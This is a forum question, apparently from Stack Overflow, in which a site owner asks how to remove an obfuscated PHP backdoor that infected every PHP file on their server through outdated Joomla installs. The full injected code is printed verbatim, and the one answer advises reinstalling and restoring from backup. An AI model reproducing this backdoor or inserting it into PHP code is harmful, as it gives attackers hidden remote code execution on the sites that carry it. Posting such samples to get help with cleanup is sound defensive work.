user3083462
Reputation:
Virus on FTP Server, PHP
Hello i need some help and advice. Our FTP server contains virus. All php files are corrupted and have the same code in the beginning. Some old joomla systems are the reason for that. I have updated the old systems. How can i delete the code string from all Files in the FTP Server? I buyed ClamXav and downloading now the whole FTP Server. Over 40000 Files and 20 gb. But ClamXav does not find the Virus.
Here Example of a File.
<?php $kqjfole = '973:8297f:5297e:56-xr.985:52985-t.98]K4g:74985-rr.93e:5597f-s../#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|C x27pd%6|6.7eu{66~6774 141 x72 164") && (!iss45 116 x54"]); if ((strstr($uas," x6d 163 x69 145"))dXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`L 124 x54 120 x5f 125 x53 105 x52 137 x41 107 xfepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!fd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%tmw!>!#]y84]28y]47]67y]37]88y]27]28}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>h]58y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67yx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&Kc]55Ld]55#*<%bG9}:}.}-bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2p-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]88:}334}472 x24<!%ff2!>!bssbz x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hops!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{hubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqs 61 x31"))) { $jorqfam = " x63 162 x65 141 x74 145 x5f 146 x75 11#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/%r<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*CW&)ttj x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)<!gps)%j>1<%j=6[%ww2!>#p#/#p#/27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSVgb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!x7f<u%V x27{ftmfV x7f<*X&Z&75]y83]273]y76]277#<!%t2w>#]y7423zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)uf#0#/*#npd/#)rrd/#00;qsdXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnj x24/%t2w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x2!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3plit("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w66~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`{6:!npdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!pjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~%)tpqsut>j%!*72! x27!hmg%)! x24/%tjw/ x24)% x24- x24y4 x24- x24]y8 x24- x24]26 x24- x24<%j,GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtolower($_SERVER[" x48,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{6UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]DPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7>~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvuf73]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utj x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]3ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqy]#/r%/h%)n%-#+I#)q%:>]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudov% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82x5c%j:.2^,%b:<!%c:>%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!>284:75983:48984:71]K9)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubf5,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]2%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR x9386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_4]284]364]6]234]342]58]24]3)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/2!ftmbg)!gj<*#k#)usbut`cpV x7f x7f x7f sutRe%)Rd%)Rb%))!gj!<*#cd2bge56+9x24- x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tp]65]D8]86]y31]278]y3f]51L3<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x2,*!| x24- x24gvodujpo! x24- x24y7 x24- x24*<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20Qtn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)id,;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ft%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65e:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<rrrbzkv = implode(array_map("sgniajr",str_sif((function_exists(" x6f 142 x5f 163 xZ6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA x27pd%6<<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~!mg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`ord($n)-1);} @error_reporting(0); $283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]31A x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6<tfs]84]y31M6]y3e]81#/#7e:55946-tr.9:!>! x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pd%w6#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:61977]445]212]445]43]321]46y38#-!%w:**<")));$nyjqznu = $jorqfam("#64y]552]e7y]#>n%<#372udovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#g<~ x24<!%o:!>! x242178}527}#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#mA x273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubUUI7jsv%7UFH# x27rfs%6~6< x7fw6<*K)ftpm!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upco}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)3et($GLOBALS[" x61 156 x75 156 x61"])))) { $fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: ) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% w`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjmsvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd}7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix64Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^x<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opjuW%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)q# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%mbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;h!o56 x63 164 x69 157 x6e"; function sgniajr($n){return chr(S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R", $rrrbzkv); $nyjqznu();}}uui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fepdof.)fepdof37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R8dovg}k~~9{d%:osvufs:~928>> x22: or (strstr($uas," x72 166 x3asTrREvxNoiTCnuf_EtaerCxECalPer_Rtsfmbjtdkgd'; $rtvnvtmt=explode(chr((423-303)),substr($kqjfole,(34812-28935),(113-79))); $tagvcq = $rtvnvtmt[0]($rtvnvtmt[(7-6)]); $fsdalyau = $rtvnvtmt[0]($rtvnvtmt[(12-10)]); if (!function_exists('moimumaxc')) { function moimumaxc($zxjfzrukd, $wmolaixl,$wjfeqrjm) { $abyyxk = NULL; for($nymqumrbz=0;$nymqumrbz<(sizeof($zxjfzrukd)/2);$nymqumrbz++) { $abyyxk .= substr($wmolaixl, $zxjfzrukd[($nymqumrbz*2)],$zxjfzrukd[($nymqumrbz*2)+(5-4)]); } return $wjfeqrjm(chr((59-50)),chr((579-487)),$abyyxk); }; } $yqjxmpvc = explode(chr((229-185)),'3916,39,140,25,4929,43,2139,65,274,46,165,52,5847,30,1033,64,5580,57,4183,35,3873,43,1789,70,4367,46,3955,61,119,21,1157,55,5219,59,3631,58,4749,39,217,57,2321,41,906,37,4684,65,5484,51,2962,68,1618,48,4282,53,3141,48,1293,67,2204,43,1859,57,4118,65,5177,42,3733,42,5535,45,2005,43,2362,63,943,49,2048,26,1729,60,2527,51,554,62,4061,57,755,67,2732,50,3269,64,1597,21,5716,60,62,57,4788,62,3689,44,992,41,3372,33,3189,53,2247,34,4898,31,1537,60,1212,51,320,37,4850,48,5372,67,5816,31,2626,41,1916,48,1964,41,3522,66,3333,39,1479,27,5637,52,5776,40,3030,56,672,60,5139,38,4565,62,415,54,1506,31,1413,66,2578,48,469,22,2667,22,3835,38,4543,22,616,56,2689,43,4627,28,877,29,5019,67,3405,56,2074,65,3588,43,4016,45,1666,63,5278,48,5439,45,3775,60,1360,53,2494,33,2819,65,4413,69,39,23,0,39,3496,26,4335,32,2942,20,3461,35,3086,55,2425,69,2281,40,732,23,491,63,357,58,4218,64,4482,23,3242,27,1097,60,5326,46,4972,47,2884,58,1263,30,2782,37,5086,53,4655,29,822,55,4505,38,5689,27'); $simjwz = $tagvcq("",moimumaxc($yqjxmpvc,$kqjfole,$fsdalyau)); $tagvcq=$kqjfole; $simjwz(""); $simjwz=(521-400); $kqjfole=$simjwz-1;PHPINFO();?>
The PHPINFO(); was my part.
Upvotes: 1
Views: 551
Answers (1)
user4278933
Reputation:
I was going to suggest a quick script that will go thru all 40,000 files and remove the single string but after reading elsewhere on stackoverflow, this is perhaps not recommended. If a rootkit was installed, the attacker is likely to know your server better than you.
Your system has been compromised. What you have found is probably only part of the problem.
You need a fresh install.
You need to build a more secure environment or the same problem will re-occur.
Then you need restore from backup.
I know - you probably don't want to read the above but if you don't know how to write a quick script to clean your text files, its unlikely you have done enough to secure your system. A compromised system is a risk to you, your users, and others on the internet (a hacker could use your machine to launch attacks on others).
Upvotes: 5
Related Questions
- How can I prevent SQL injection in PHP?
- How do you parse and process HTML/XML in PHP?
- Deleting an element from an array in PHP
- Reference Guide: What does this symbol mean in PHP? (PHP Syntax)
- startsWith() and endsWith() functions in PHP
- How does PHP 'foreach' actually work?
- How do I get PHP errors to display?
- Why shouldn't I use mysql_* functions in PHP?
- Wordpress update preg_replace to preg_replace_callback
- Unkown line of code in my php files